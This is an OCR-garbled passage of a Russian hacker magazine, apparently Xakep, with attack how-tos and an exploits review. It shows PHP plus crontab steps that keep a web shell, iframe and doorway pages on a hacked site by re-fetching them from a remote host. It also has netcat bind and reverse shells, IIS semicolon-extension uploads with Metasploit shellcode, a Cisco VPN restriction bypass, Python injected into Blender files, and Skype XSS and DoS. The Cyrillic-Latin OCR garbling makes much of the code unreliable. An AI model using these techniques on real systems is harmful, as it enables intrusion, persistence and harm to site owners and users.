страшными ошибками, если в переменной указать /еіс/раззѵѵб, хотя никто 
не помешает проверять наличие и нклудов другими файлами, например /еіс/ 
Ьозіз. 




ЗАДАЧА: НАСТРОИТЬКРОН ДЛЯ ПОСТО- 
ЯННОГО НАЛИЧИЯ ФАЙЛА НА СЕРВЕРЕ 



РЕШЕНИЕ: 

Допустим,™ взломал сайт и оченьхочешь, чтобы там остался твой шелл/фрейм/ 
дор. Рассмотрим все ситуации подробно. 

1) Шелл. 

Создадим файлик (назовем его сгопвЬеІІ.рЬр] с содержимым: 

<?рЪр 

$Е11е = /Іюше/изег/млпт/зііеіі .рЦр; 

ІТ (Ті1е_ехізі:з ($Ті1е) == Гаізе) { 
сору ( 1 ЩЩр : / /ілплм. 1і4х0г . сот/ зйеіі . СхЦ 1 , $Гі1е) ; 

} 

?> 



<?р1гр 

$ТезСЕі1е = 1 /Ьоте/изег/^лллм/богз/зШетар .ЪРтІ 1 ; //файл для 
проверки наличия доров 

іб (Іі1е_ехіз1:з ($ЦезЦТі1е) == Таізе) { // проверяем на наличие 
файла и, если нет. . . 

зузЦеш('гш -гі /Ьоте/изег/ѵллм/богз;тк(ііг /Іюше/изег/тлплм/ 
Цогз 1 ) ; 

сору ( ' йТЦрЩ/шллпМхОг.сот/богз.-Ьдг 1 , 

' /Цоте/изег/ѵллпт/богз/ 1 ) ; // копируем архив с дорами в папку 
зузСеш( 'Саг хгі /Ьоте/изег/ѵллм/сіогз/сіогз . Тдг ' ) ; 

//и разархивируем его 

} 

?> 

А теперь отом, какзаставить крон обрабатывать наши файлы. Создадим в папке 
/Ьоппе/ивег/ временный файл ІезЕ 



Код будет проверять, существует ли файл на сервере и, если его нет, скопирует 
ствоего сайта. Кстати, убедись, что директива аІІоѵѵ_игНореп установлена в 
значение Оп, иначе используй функцию зузІетО и командуѵѵдеС 

2) Фрейм . 

Фрейм мы будем размещать в файле іпсІех.рИр, хотя ты можешь сделать это с лю- 
бым другим файлом. Для начала скопируй файл іпбех.рЬр сфреймом внутри на 
удаленный сервер; это будетнаш бэкап, на случай если админ заметитфрейм. 
Далее напишем скриптсгоп^гате.рЬр: 



ЗНЕЬЬ=/Ьіп/Ьаз]і 

МАІЬТ0=изег 

0 - 59 **** /Ьоте/изег/сгоп.рЬр 

Разберем его: первая строка указывает, какую шелл-оболочку нужно использо- 
вать, вторая, какому юзеру отправлять отчет о работе крона и, наконец, третья 
указывает, что файл /Ьоте/изег/сгоп.рЬр должен выполняться каждую минуту. 
Теперь занесем запись в таблицу, для этого выполним команду: 



<?рЬр 

$Тгаше = ' здесь код твоего фрейма' ; 

$Тгаше = ргед_дио1:е ($Е11е, 

$Е11е = ^і1е_деЦ_соп1:еп1:з ( ' /Ьоте/изег/тлмм/іпбех.рЬр ' ) ; 
ргед_ша1:с]і($Тгаше / $гезиІЦ, $Ті1е) ; // проверяем файл на нали- 
чие фрейма 

іб ($гезиІТ. == 1 ') { // если фрейма нет 
зузСеш( 'гт /Ьоте/изег/ѵшя/іпсіех.рЬр' ) ; // удаляем файл 
сору ( 1 ЬТЦр : //ілплм.Ь4х0г . сот/іпсіех. ЕхЕ 1 , 1 /Ьоте/изег/ілплм/ 
іпЬех.рЬр 1 ) ; //и копируем на его место файл с фреймом 
} 

?> 

3)Доры. 



сгопТаЬ /Ьоте/изег/ЦезЦ 

Готово! В каталоге /ѵаг/зрооі/сгоп будетсоздан файл «изег» примерно ста ким 
содержимым: 

# БО ЮТ ЕБІТ ТНІЗ ЕІЬЕ - ебіЕ ТЬе шазЕег апсі геіпзЬаІІ. 

# (/Ьоте/изег/ЦезЦ іпзЕаІІесі оп Моп Маг 29 02:31:34 2004) 

# (Сгоп ѵегзіоп -- $Іб: сгопЕаЬ. с , ѵ 2.13 1994/01/17 03:20:37 
ѵіхіе Ехр $) 

ЗНЕЕЬ=/Ьіп/Ьаз]і 

МАІЬТ0=изег 

0-59 * * * * /Ьоте/изег/сгоп.рЬр 
— и файл /Ьоте/изег/сгоп.рЬр будет за пускаться каждую минуту. 
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► 039 






ш 






Еагу 


Еагу 


Еазу 


Наск 


Наск 


Наск 



Файл Правка Вид Журнал Закладам Настройка Справка 

ФувсгфІЭЗЗ :-/(> ,/*1р 
Еяаіріе 



..и результатего работы, как видим, успешной 





-Іаіхі 


1 Аи.а ^ і;;і| М ѲІ а| 


РТРХсі-ох 1.И - Сгдѣ-г Р1Рс<1 Кіісз оТГ *Ьс мігс? 
Ву РііхТЬгкк <ГпхіЬі*г!<:РаіпІ і он 1 ііиз.аіц) 

Іірдаівс аі <1Л1:р:/ѴЕвІ<1:о*»евси»‘і*у.4и.ги> 




ЫаТсМп# АН ггаІРІс 





№7 



ЗАДАЧА: СДЕЛАТЬ ВИЗУАЛИЗАЦИЮ 
ТОПОЛОГИИ ИЗ ЗАХВАЧЕННОГО СЕТЕ- 
ВОГО ТРАФИКА 



РЕШЕНИЕ: 

Подобные вещи умеет делать ИМАР, правда, после передачи ему его же отчета 
либо при проведении сканирования. Движоктам еще сыроват, при обилии 
хостов жутко виснет и делает работу невозможной. Поэтому предлагаю тебе 
немного другое решение. 



Перехват файлов по РТР-транспорту 



1. Зададим какой-нибудь параметр для сборатрафика в файл .рсар: 

бсрбшпр -и Дезе. рсар -і ебМ Сер рогС 6881 ог ибр \( 33210 ог 
33220 \) 

2. Сохраненныйтрафикскормим специальной программе — гиппіпі [ гитіпЕогд ]. 
которая в два щелчка выдасттебе топологическую карту в нескольких вариантах 
просмотра. 
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ЗАДАЧА: СНИФАЯ СЕТКУ, ПЕРЕХВА- 
ТИТЬ ФАЙЛЫ В ЯВНОМ ВИДЕ ПО РТР 



РЕШЕНИЕ: 

Современные сниферы позволяют нюхать трафик, но получать целые файлы — 
оченьпроблемно. Собирать в бинарном виде дату этих файлов и сохранять 
вручную — неудобно! Для автоматизации процесса существуют более простые 
программы, вроде РТРХегохѵІ.О ( тетЬегз.ІюгШпесіІѵ.сот/зекІогБесигДѵ/ 



рго]ес1:5/1і:рхегох.Ьі:пп[ 1. Кактолько она палит, что где-то передается файл, то 
сразу перехватываетего и сохраняетлокально. 

Все, что требуется — только запустить программу. Предварительно надо пере- 
направить траф на себя, проведя одну изатакпо несанкционированному сбору 
пользовательского трафика. Утилита открывает неразборчивый режим сетевой 
карты, поэтому опционально эта возможность должна быть поддерживаема 
твоим адаптером. 

Софтинка имеетлишь одно ограничение — нетподдержки пассивного режима 
работы РТР. В остальном — работает без каких-либо глюков. 



№9 



ЗАДАЧА: НАУЧИТЬСЯ РАБОТАТЬ 
СЫЕТСАТПОД ѴІ5ТА 



РЕШЕНИЕ: 

Здесь нет ничего сложного, но есть уловка, которую немногие знают. 
Попробуй при вызове интерпретатора обратиться к роѵѵегзЬеІІ.ехе, 
вместо привычного сглб.ехе и посмотришь, что получится :). 



Организация ВіпбЗЬ.е11 : 

пс -1 -е рсжегзЬеІІ . ехе -С 
беіпеі: Іосаіііозі: 666 



-р 666 



Организация ВеѵегзеЗЬеІІ : 
пс -1 -р 666 

пс -е режегзііеіі . ехе Іосаіііозі: 666 

Еще один трюк связан с широкими возможностями РоѵѵегБЬеІІ. 
Например, на нем можно создать клон пеісаі:, только в скриптовой 
интерпретации: 

Іипсбіоп Тгасе-Рогб ( [іпб] $рогб=23 , 

[збгіпд] $ІРАбгезз="127 .0.0.1", [змібсіі] $Ес1ю=$1а1зе) { 
$1ізбепег = пем-окдесб Зузбет.Ыеб . Зоскебз . 

ТсрЬізбепег ( [Зузбет.Ыеб . ІРАббгезз] : : Рагзе ($ІРАбгезз) , $рогб) 
$1ізбепег . збагб ( ) 

[Ъубе [ ] ] $Ъубез = 0..255|%{0} 

тагШе-козб "Маібіпд бог а соппесбіоп оп рогб $рогб. . . " 
$с1іеп1 = $1із1епег . АссербТсрСНепб ( ) 
шгШе-козб "Соппесбеб Ігош $ ($с1іепі: .Сііепб . 



КетобеЕпбРоіпі: ) " 

$збгеат = $с1іепі: . СебЗбгеапб ) 

ѵбіі1е(($і = $збгеат. Кеаб ($Ъубез , 0, $Ьу1ез .ЬепдСІ!) ) -пе 0) 

{ 

$Ъубез [ 0 . . ($і-1) ] ]%{$_} 

іі ($ЕсЬ.о) {$з1геаш.Мгіі:е($Ьуі:ез / 0,$і) } 

} 

$с1іеп1: . Сіозе ( ) 

$11збепег . Збор ( ) 

ѵ/гібе-іюзб "Соппесбіоп сіозеб. " 

} 

Пример запуска сценария: 

Р3> Тгасе-Рогб -ір 192 . 168 .1.99 -рогб 333 
Маібіпд бог а соппесбіоп оп рогб 333 . . . 

]Хкж зегірб ѵ/аібіпд бог соппесбіоп оп рогб 333 . I ш.11 соппесб Іо 
Йііз роге изіпд беіпеб.ехе, апб бкеп шгібе ѵгогб "Тезб" іпбо іб: 

Соппесбеб бгот 192.168.1,99:61829 
84 
101 

115 

116 
13 
10 

Соппесбіоп сіозеб. 

Соответственно, меняя «і:е5І:»-параметр, ты можешь добиться успеш- 
ной передачи команд на исполнение, ц-ц 



► 040 
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50% сотріеііесі 



— і 

Загружено: 100 % вкуса, 100 % пользы 

Открыть еще один глазированный сырок "Зебра" 
после завершения загрузки 



■ 



Я сыт : ) 




у срі± :) 



Взломай голод, пока он не взломал тебя! 

Ты ещё думаешь, как? 

Просто - с помощью глазированного сырка «Зебра»! 



Ищи на прилавках города! 












взлом 



I АНДРЕЙ КОМАРОВ КОМАКОѴфІТОЕРЕІЧСЕ.ВІІ ИТЦ «АНАЛИТИКА» / ІТОЕРЕМСЕ.РУ 



ЕХРЮІТЗ 

КЕѴІЕѴѴ 




Г5 


1 





ОБЗОР ЭКСПЛОИТОВ 

РУБРИКУ МОЖНО ПЕРЕИМЕНОВЫВАТЬ В «КАК СТРАШНО ЖИТЬ». УЧИТЫВАЯ, ЧТО С КАЖДЫМ НОМЕРОМ. ДНЕМ И ДАЖЕ ЧАСОМ 
ЧИСЛО ОБНАРУЖЕННЫХ БРЕШЕЙ В РАЗЛИЧНЫХ СИСТЕМАХ И ПО НЕ УМЕНЬШАЕТСЯ. А НЕИЗМЕННО РАСТЕТ. МЕЖДУ ПРОЧИМ. К ЧИТА- 
ТЕЛЯМ. ДЕЛОВОЕ ПРЕДЛОЖЕНИЕ НА ПЕРСПЕКТИВУ - ЕСЛИ ЗАНИМАЕШЬСЯ АНАЛИЗОМ КОДА. ИЗУЧЕНИЕМ АСПЕКТОВ БЕЗОПАСНОСТИ 
ПО И МОЖЕШЬ ЧЕМ-ТО ПОДЕЛИТЬСЯ. ТО ПРИСЫЛАЙ СВОИ ЗАМЕЧАНИЯ ИЛИ ПРЕДЛОЖЕНИЯ НА МОЮ ПОЧТУ. НАИБОЛЕЕ ИНТЕРЕСНЫЕ 
ИЗ НИХ ПОПАДУТ НА СТРАНИЦЫ РУБРИКИ И ПОРАДУЮТ ГЛАЗ. ИНТЕРЕСНЕЕ ВСЕГО. ЕСЛИ ЗТО БУДУТ ЕЩЕ НЕОПУБЛИКОВАННЫЕ НИГДЕ 
ЭКСПЛОИТЫ ИЛИ БРЕШИ БЕЗОПАСНОСТИ. 




Раііпег 

Яесі иігез Іоскѳй еІошТассе» ю 
$ррсіііс ехігаган гв$йигс«5 ап0 аррІісаііоп& 



Согрогаіе Мападо^І 

Ретоте-эссе&а изеге гецшгѳ 
$0алпір$$. аа$у іо и$* асоа$$ 

Ю согрогэів пеіѵ^огк геюигсез 



Жегшіе изегз газу гедиіге ІідМѵѵеідМ 
ассвзз 10 отаіі апО МеЬ-Ьазей 
эрріісаіюпз ігот э риЫіс тасЬіпе 



Етріоуееаі Ноте 

Оау эхюлйег» апсі тоЬііа атріоуоо$ 

гериіге сопвдіепі ІАМ-ІИю* ІиІІ-пвіѵѵогк 
ассезз іо согрогаіѳ гаэдигсез эгкі арріісаіюпз 



[СІюпіІеваааѴРМ 



РиЫіс Тегтіпаіз 



РАЗЪЯСНЕНИЕ ПРИМЕНЕНИЯ СІ_ІЕІЧТІ_Е55 ѴРІМ55І. 




ОБХОД ОГРАНИЧЕНИЙ В СІ5С0 ѴРЫ 55Ь 



СІЗСО ѴРЫ 55Е — модуль к СІЗСО АЗА и целой линейке продук- 
тов СІЗСО, который предназначен для расширения сетевого функцио- 
нала девайса. Он позволяеторганизовать распределенную ѴРІЧ-сеть, 
увеличив сетевые ресурсы инфраструктуры за счет разнесенных через 
интернет клиентов. 



ЕХРЮІТ 



| СІЗСО ѴРІ\І СІіепДезз — ограничивающий клиента опционал, 
который разрешает или запрещает пользователю ѴРЫ обращаться к 
ресурсам виртуальной частной сети. Реализация механизма ограниче- 
ний воистину выполнена очень криво. СІЗСО шифрует ресурс в ужасную 
строку, затем подставляет к ней специальное слово, конструирует л инк 
и только тогда доверенный пользователь, открывая ее, получает доступ 
к ресурсу. 

Как выяснилось, любой желающий можетспокойно обратиться клюбому 
интернет/іпіхапеі-узлу, обходя ограничения системы. Предположим, 
желанный ресурс — йрѴ/іпІгапеО Чтобы обратиться к нему, следует 
произвести следующие действия: 

1) Преобразуем строку кНОТІЗ — иддс://ѵадепагд. 

2) Символы АЗСІІ-последовательности конвертим в НЕХ — 
756767633а2Ш7661 67656е6 17267. 



3) Открываем в браузере линк— Ір5://[СІ5СОѴРМ551_1/+С5СО+0075676 
7633а2Т2Г7661 67656е61 7267++ . 

Все! Для упрощения процесса злодеи написали скрипт: 



# ! /Ьіп/ЬазЪ. 

есЕю -п "шгііе ІЖЬ : " 

геай а 

Ъ='есЕю -п $а I Щ 1 [а-ш] [п-г] [А-М] [N-2] 1 1 [п-г] [а-т] 
[N-2] [А-М] 1 | ой 

-Схі | сиС -с8- I зей 1 з/ / /д ' ' I разСе -з -Й 1 1 ; 
есЕю -п "ІЖЬ " 




НАСТРОЙКИ ОГРАНИЧЕНИЙ ШЕЫТІ.Е55 В СІ5С0 ѴРЫ-МОДУЛЕ 



есйо -п "АЕЕрз:// [СІЗСОѴР№ЗЬ] /+СЗСО+00" ; ; есЬо -п $Ь; 
есЕю -п " ++ " ; 
есЕю " " ; 



50ШТІ0Ы 



|Активируй дополнительныетипы АСЕ-листов (ѵѵеЫуре/ 
ЕіІЧег), атакже ознакомься с документом «Сізсо Ііпсіегзіапсііпд ЕеаШгез 
ІМоіЗиррогІесІ іп СІіепйеззЗЗЕѴРІЧ». 



ТАВ6ЕТ5 



Сізсо АЗА <= 8.x. 




ОБХОД ОГРАНИЧЕНИЙ БЕЗОПАСНОСТИ 
В МІСК050РТ 115 



Уязвимость найдена в известнейшем ѴѴЕВ-сервере от МісгозоіЧ. 
Путем загрузки специально сформированных АЗР-файлов на узел 
существует возможность выполнить произвольный код, пробекдорить 
систему и далее — делать практически, что угодно. Вызвано это недоста- 
точными ограничениями при проверке расширений файлов. 



ЕХРЮІТ 



| N5 нормально воспринимает имена файлов с расширениями: 
.азрі.дф .азрщрд, .азр;.ехе. При проверке сервер обращает внимание 
только на первое расширение, а что стоитза «;» — ему без разницы. 
Методика состоит в том, что, используя такое обстоятельство, мы пред- 
варительно готовим злонамеренный файл, загружаем его на сервер 
(идеально, если это будет картинка], затем обращаемся через ѴѴЕВ для 
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ШІТ5 

ЕѴѴ 



ЕХРЮІТ5 I 

КЕѴІЕѴѴ 1 




ЕХРЮІТЗ 

КЕѴІЕѴѴ 






ЕХРЮІТ5 

РЕѴІЕѴѴ 




ЕХРЮІТ5 

РЕѴІЕѴѴ 



ЕХРЮІТ5 

РЕѴІЕѴѴ 
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КОД 5НЕІ_І_С00Е'А ПРЕОБРАЗОВАН В ПОС- 
ЛЕДОВАТЕЛЬНОСТЬ СИМВОЛОВ, ПРЕД- 
СТАВЛЕННЫХ В ВИДЕ ОПЕРАТОРА ВЗЯТИЯ 
СИМВОЛАПО ЕГО НОМЕРУ ВТАБЛИЦЕ А5СІІ 



запуска шелл-кода на исполнение. Разработ- 
чиками известного дистрибутива Васкіхаск 
было создано средство, работающее именно 



аща\ дісы и! I №1- I ^1 

аул 



потакой схеме ( Ьаск1:гаск.іі/~еппаеп1:/ехр[оіІ5/ 
115-азр.рѵ І: 



С ПОМОЩЬЮ ХБОТООІ. МОЖНО ДЕЛАТЬ С МЫШЬЮ И КЛАВИАТУРОЙ ПРАКТИЧЕСКИ ВСЕ, ЧТО 
УГОДНО. НАПРИМЕР, ПОТАЙМЕРУ ИСПОЛНИТЬСНЯТИЕСКРИНШОТАСОПРЕДЕЛЕННОЙЗОНЫ 
ЭКРАНА 



./ІІЗ-азр.ру <ішадеорд> <номер з!іе11сос1е> 



Опционально, под номером шелл-кода подразумевается 0 — зЬеИ_ЬіпсІ_ 
ѣср, 1 — те1:егрге1:ег_ЬіпсМ:ср, 2 — ѵпсіщесЦэіпсНср, собственно, одни 
из самых известных рауіоасіз из пакета МеІазрІоМ:. 

гооС@апс1гез : /Стр# ./ІІЗ-азр.ру ітаде . зрд О 

На выходе получаем ітаде. азрщрд, которую требуется прогрузить на 
ѴѴЕВ-сервер. Конечно, такая возможность бывает далеко не всегда. Тем 
не менее, если она есть, через форму обзора выбираем наш файл, льем 
на сервер (например, в папку «ітадез», «аѵаіагз», «иріоасіз»). После 
чего обращаемся к ней: 

ТШСр : / /127 . О . О . 1/ ітадез /ітаде . азр; . зрд 




ИНЖЕКТ КОДА В ФАЙЛЫ ПРОЕКТОВ 
ВЬЕМОЕВ 



Віепбег [ Ыепбег.ога І — это известный продукт для 30-разра- 
ботчиков и аниматоров, который позволяет использовать средства 
моделирования, рендеринга, постобработки видео и многое другое! На 
самом деле полноценно пользоваться им умеюттолько профессионалы, 
потому что он непроств использовании. Попал он в рубрику потой прос- 
той причине, что существует возможность использовать его выходные 
файлы (формат .ЫепсІ] в качестве вредоносных. 



ЕХРЮІТ 



| Открой текстовый редактор кода ВІепсІег(Техі ЕбТог), правый 
клик, «ІЧеѵѵ». В появившемся поле, пишем свой код на Рубзоп, например: 



гооС@апсІгез : /Стр# пс -ѵѵ 10.12.6.6 31337 

# 2егЬіоп [10.12.6.6] 31337 (?) ореп 

# 

# МісгозоіС Міпсіомз [Ѵегзіоп 5.2.3790] 

# (С) СоругідіШ 1985-2003 МісгозоІС Согр. 

# 

# с: \ѵ\тп<Томз\зузСет32\іпеСзгѵ>ѵт1іоаті 
> пС аиСЪогіСуХпеГжогк зегѵісе 



ітрогС оз 

оз . зузкет ( " саіс . ехе " ) 

В поле«Тех1: Ыате» (ТХ:ТехЕ001) заменяем значение на свое суказани- 
ем нашего скрипта ТХ:тузсгірЕ Затем переходим на панель «Виііопз 
ѴѴіпбоѵѵ», из выпадающей панели (рапеі) выбираем «5сгі рі», при этом 
проверив, что графа «епаЫе 5сгі рі Ііпк5»активна.Жмем на «Ыеѵѵ», 
выбираем нами созданное скриптовое описание (тузсгірі:]. Из выпа- 
дающего меню событий выбери «ОпЕоасІ». Теперь сохраняем файл в 
выходной, это делается из «Изег Ргеіюгепсез Рііе 5аѵе». 



Порядок! 



ТАК6ЕТ5 



Віепсіег 2.49Ь, В Іепсіег 2.40, ВІепсІег2.35а, ВІепсІег2.34. 



БОШТІОЫ 



| Тщательнее фильтровать прогружаемое на сервер содержи- 
мое на прикладном уровне. 



ТАК6ЕТ5 



МісгозоР I піегпеі: Іпіюгтабоп Зегѵісез (N5) 5.х/6.х. 



50ШТІ0Ы 



| Производитель был уведомлен о подобном способе внедре- 
ния злонамеренного кода в свои продукты, но никакой ответной реакции 
не последовало. Из практических советов можно дать способ изучения 
.Ыепб-файла — парсить проектна предмет50ЫА5сгіриіпк ( ЫТрУ/ѵѵѵѵ 
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взлом 



ЕХРЮІТ5 

КЕѴІЕѴѴ 



ЕХРЮІТ5 




ЕХРЮІТЗ 


РЕѴІЕѴѴ 




РЕѴІЕѴѴ 




ЕХРЮІТЗ 

РЕѴІЕѴѴ 





ГООС@ЬМ: ~ - 5ЬйІІ - Ко и ій іё <4> 



50Ѳ ‘ 5ІТЕ КЗЕХѴЗШго тПКССССС02ѴТХЗѲѴХ4АРѲАЗННОАѲѲАВААВТДАО2АВ2ВВ«а 
Г Е 6Н0Н 3 КОООС-2 Е 283 С 2 Р8ННЕН61.Е и 03 04 3 ОНЙЕ 4 Рв Р РРМЬКК 3 N005 ЛМОСЕ КМК0М7 АА ѴѴѴѴѴ 

иѴѴ ' ,ПІ бІиіІ ' 1 Кввмй?^> Л аі ' " ‘ ПППІ '""'* ІШШ ‘ «Г * в?Ч 



^ОПі' - ѵчм 5ніесі оь|есі 



§; 



Зевдоп Е<іі1 Ѵіеи Вооктагкз Зеииіпдь Неір 



гооТ@ЬМ: # пс -ѵ 192. 160. 2 .19 4444 
192-163,2.19: іпѵег^е Ьоъх Іоокир Гаііегі: 
а оиХ 

(инкнонн) [192-163-2.19] 4444 (?) ореп 
НІСГОБОН Міпгіомз 2&00 [Ѵегзіоп 5.0Ѳ.2195) 
(С) СоругідЫ 1985-200Ѳ ИісгозоІІ Согр. 



цілкпоуп зегѵег еггог 



с:\щноан5\5у5Г«і32> 



ККе с))уу N МИН " Лгесіогу с геа X е0 . 

20Ѳ РОРТ сотталгі ыіссеььЩі - 

150 Орепіпд А5СІІ тогіе гііа^а соппесііоп ^ог Шіе Ііаі. 



аітіпсІ.пІ/ЫепсІе 
сам код. 



іа.Ы:пп[#5І:гисІ:5сгіріипк ]. куда помещается 



> і 5Ье1І 



5а55іо п ЕсііЬ Ѵіен Вооктагкз 5еШнд5 Неір 



КТО БЫ ЗНАЛ, ЧТО В СТОЛЬ БЕ- 
ЗОБИДНЫЙ ПРОЕКТ МОЖНО 
ВНЕДРИТЬ ЧТО-ТО ВРЕДОНОС- 
НОЕ! 




УЯЗВИМОСТИ В ШОХ-ВЕРСИИ 5КУРЕ 



ЕЕЭ Сразу после нового года двое итальянских исследователей 
обнаружили странный косяк в Зкуре (и даже несколько]. Скорее, эти уяз- 
вимости я бы причислил не к классам конкретных брешей безопасности, 
а к ошибкам проектирования (безідп еггог]. Касаются они только Ыпих- 
версии, ОІЛ-интерфейс которой написан с использованием средств 
библиотеки ОТ [ дТпокіа.сот/ргосІисЫ . 



ЁХРІОІТ 



1. Реализация рзеибо-Х55. Многие поля программы воспринимаюттеги 
НТМІ_ из-за того, что они неурезаются программно. Возможно, раз- 
работчиками подразумевалось, что пользователь может сделать свой 
никжирным или добавить контакт в другом цвете с помощью средств 
разметки, но, по моему мнению — просто неуследили. Попробуй исполь- 
зовать тэг«"><М ><"» в поиске контактов, обзоре для выбора файлов для 
отправки, полях профиля. Увидел? Конечно, эксплуатировать такое — 
достаточно трудно, но, если проявить смекалку, можно добиться инте- 
ресного. Например, поле «Домашняя страница» в профиле доступно для 
клика сторонним пользователям. Это значит, если мы сумеем засунуть 
туда реализацию Х55, то вполне вероятно, что, когда интересующийся 
нашей домашней страницей юзер кликнет по ней, просматривая наш 
профиль, его ждет беда, хотя бы на уровне «рЫзЫпд»-атаки: 

хакер . ги " >Ошибка ! Недопустимый объект гиперссылки . > 

При таком раскладе в профиле в качестве страницы будет виднеться 
доодіе.іі, а вот после клика пользователь угодит на наш сайт журнала! 
Естественно, в реалиях место «Хакер. ру» займет ресурс с вредоносным 
кодом, на котором втом числе может располагаться сценарий проведе- 
ния Х55-атаки. 

2. Оепіаі Об Зегѵісе — загрузка ЦП на 100%. Для изучения атаки требу- 
ется установка хсЫооІ [ зетісотрІеІе.сот/ргоіесІБ/хбоІооО — средства 
имитации виртуальных мыши и клавиатуры. Часто его используют для 



автоматизации ручныхзадач в Ыпих/РгееВЗО, например, повторяю- 
щихся действий в рамках браузера, какой-то программы и так далее. 
Впрочем, для ѴѴіпбоѵѵз таких средств навалом (АіЛотііе). 

Сначала курсор мыши требуется руками установить в поле ввода сооб- 
щения Зкуре, затем средствами хсЫооІ мы сформируем большую строку, 
состоящую из знаков пробела, и отправим ее: 

зіеер 5 && хбобооі Суре " 'регі -е "ргіпб '8 ' х44801" ' " && 
хбокооі кеу Кекигп 

зіеер 5 && хбобооі Руре ' з/ . . / ' && хбоРооІ Руре " 'регі -е 
"ргіпР '8 ' х44801" && хбоРооІ Руре '/' && хбоРооІ кеу 

КеРигп 

Соответственно, 0x44801 — пробельный заменитель в хексе. 

Вследствие этого произойдет отказ в обслуживании программы из-за 
недостаточной проверки входных данных. При некоторых обстоятель- 
ствах был замечен «вылет» собеседника из программы. Более безо- 
бидные примеры переполнений были обнаружены при организации 
звонков или посылке 5М5 на номера, превышающие 89601 -символ. 



ТАРСЕТ5 



Версии <=2.1 Веіа. 



50ШТЮЫ 



В настоящее время исправлений уязвимости не имеется. 




МНОЖЕСТВЕННЫЕ ПЕРЕПОЛНЕНИЯ 
БУФЕРА В5ІЛЧ 50І.АШ5 (ЗИООР) 



В августе прошлого года были обнаружены критические уяз- 
вимости в утилите зпоор [ бос5.5ип.сот/арр/бос5/бос/81 9-2240/зпоор- 
1 т?а=ѵіеѵѵ] ОС 51ІЫ Зоіагіз. Зпоор представляет собой средство сетевого 
мониторинга и анализа, некий аналогІсрсІитр/еІЬегеаІ. Нетрудно 
догадаться, что уязвимости, эксплуатируемые в сниферах, как правило, 
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ЕХРИЛТ5 

РЕѴІЕѴѴ 



- ТПСТГГУ 

-Г 



ЕХРЮІТ5 

РЕѴІЕѴѴ 




гоо*@Ь*4: ~ - 5НеІІ - Копзоіе <4> 



Зеззіоп Есік Ѵіеѵѵ Вооктагк5 5еШпд5 Неір 



500 * 5ІТЕ К$ЕХУаУДОг6_\МІІІССССССО2ѴТХЗѲѴХ4АР0АЗНН0АОѲАВААВТААО2АВ2ВВѲВ 
ІЕ6МОЮКО0ОС2Р2В.]С2Р8НМЕМСІ-ЕІІ0.]О4 ЗОН8Р4Р0РРРМ1_КК.]МОО5.].]МОСЕКМКОМ7АА\/\/\Л/\/ 



Г 






і/иииццѵАЛЛААЛллААЛлпллАлллпллллп/ 

гоо4@Ы4: ~ - 5НеІІ * Копзоіе <6> 



т © ш 



Бѳззіоп ЕсПі Ѵіеѵі/ Вооктагкз Зейіпдз Неір 



Г00І@Ы4:-# пс -ѵ 192.168.2.19 4444 

192.168.2.19: іпѵегзе Ьозі Іоокир ^аііесі : ІІпкпоып зегѵег еггог 
сі оиі: 

ШМКШПМ) [192.168.2.19] 4444 (?) ореп 

Місгобо^і: МіпсІоѵ /5 2000 [Ѵегзіоп 5.00.2195] №в2 ІО-2 а . Шікгаѵій ііцкЗ . ев азГі ІЬил I ЗЕ , ? С рй-і. X - 1С 5 Э 5 1 

. И міііалях -> э'іт;міЫ7.ііеііаои0і[>і;|э.сооі 5ИТР К. і: ое &“44 160 «1- 

(С) СорупдМ: 1985-2Ѳ0Ѳ МісгозоП Согр. г—*. — 



С : \\ѴІМ00\Ѵ5\5уз1:ет32>| 



«Ей 10 : і . аЛ»им:1е<1ае2 . гак 
№ 1 I кідах I яігг |:-87 , 7 



ККёфууМШІМ" гіігесіогу сгеа^есі. 

200 РОКТ соттапгі зиссезг'РиІ. 

150 Орепіпд А5СІІ тосіе сіаііа соппесііоп ?ог іі 

а 



і 5НеІІ 



ГТР >: РОЕ С." >1 4 1 61 

нт? .к рос 



ИІЬоіЕ С роеХ-і: 

і іііш 1 ' 5* ревдмэдн 
зктт с росс чачи 

і ЗНТР И ДОГ*. “2 3301 42І-5.. Г 



ги'г^ч'гьлплдкчл'-г.ЬТ:. ппал :• іглі ІЬгп- ЙПТІ : С рог с “ 1 ч* 1 

шк іис 1: -і . ао.Л . с □"< - - ь»а.^1Ьдд" УДТ? С эс рі: - 1 II! 2 

швіійазЕ ьь. іеэпві і натдстп*. еа™ йКі№ 'л ѵг 

Ий. ІяаіШІ11Іми(івава..С0в -■ пы.1 ІІійаЬ 51ПТ С рві'Ь “42-883 

153.140.254.90 - . лй 1 1 кіи ас. 3 ПТР С рвг - 1261 

1 шв.і1Ьагі -> 159. 140, 254. 9С ЗЯТР V роге-1261 

І1 53. 140.254.30 : теІЛЮэе 5 ИГР С р«гХ“1261 

III. -.п. -> 4#Э . 14$4І>1 $Т7" Г- : и "“Ч 

пп . к| гіт. Іп I .ргч айн и.. • лцп 3 КТ> я рвгі И- 4.-! . 

І5І. ргеасІіы.а..саЕ ша^Цідаз С эсс1“5іи!ІІ! 

02 ,иіі . Юб.гиЧ -> гаиі»» зй» с рвтЧТОі 

52.53. 105. ІО - ? -> ЕчЫІЬйВЬ ЗЯТ? С рМЬ-’ЗТОв 

йнііШмг -> 32 .83 . 1Э5 . 10” зггт? К рйгО-3706 

ВйІІІыиЕ 159.14й.254.9С ЗДТ^ Р рогх-1261 
5 59,140.254.90 э тккіікювс 5ТПТ С рп-г-5.26; 

Ікіотіт. . I яв-г.|: 57 , усі'-іг по па о? гя + гм 1 г. И 31 7? И рсгх-Р' 



ПРОБИРАЕМСЯ НАѴѴЕВ-СЕРВЕР 



стіЬрО Ѵ. 7оигг.«-сг1е5 , Ь*Еа . ОСЬ - !> г;ь: 
П . і:-А.2 19. 171 -- поі:і;т.-- 

гпч і 1 кісгаіі 2 17. 154. 219. І? 1 І 



' С т>йге*1&24 
Р рчЗсС -іа24 



РАБОТА 501АРІ55М00Р — СНИФЕР КАКСНИФЕР! 



связаны с неправильной обработкой анализируемых пакетов стека 
разных протоколов. На примере ѴѴігезбагк: 

СѴЕ-2 006-3 627 — отказ в обслуживании и выполнение произ- 
вольного кода при анализе пакетов С5М В88МАР 
СѴЕ-2 009-3243 — отказ в обслуживании и выполнение произ- 
вольного кода при анализе пакетов ТЬ8 

СѴЕ-2 0 09 -355 0 — отказ в обслуживании и выполнение произ- 
вольного кода при анализе БСЕЕРС-пакетов 
СѴЕ-2009-3829 — целочисленное переполнение в члігебар/ 
егЕ . с при анализе беспроводного стека протоколов 

Поверь, списокможно продолжать еще долго. Из-за обилия и разнооб- 
разия протоколов и их структур разработчики иногда здорово халтурят, 

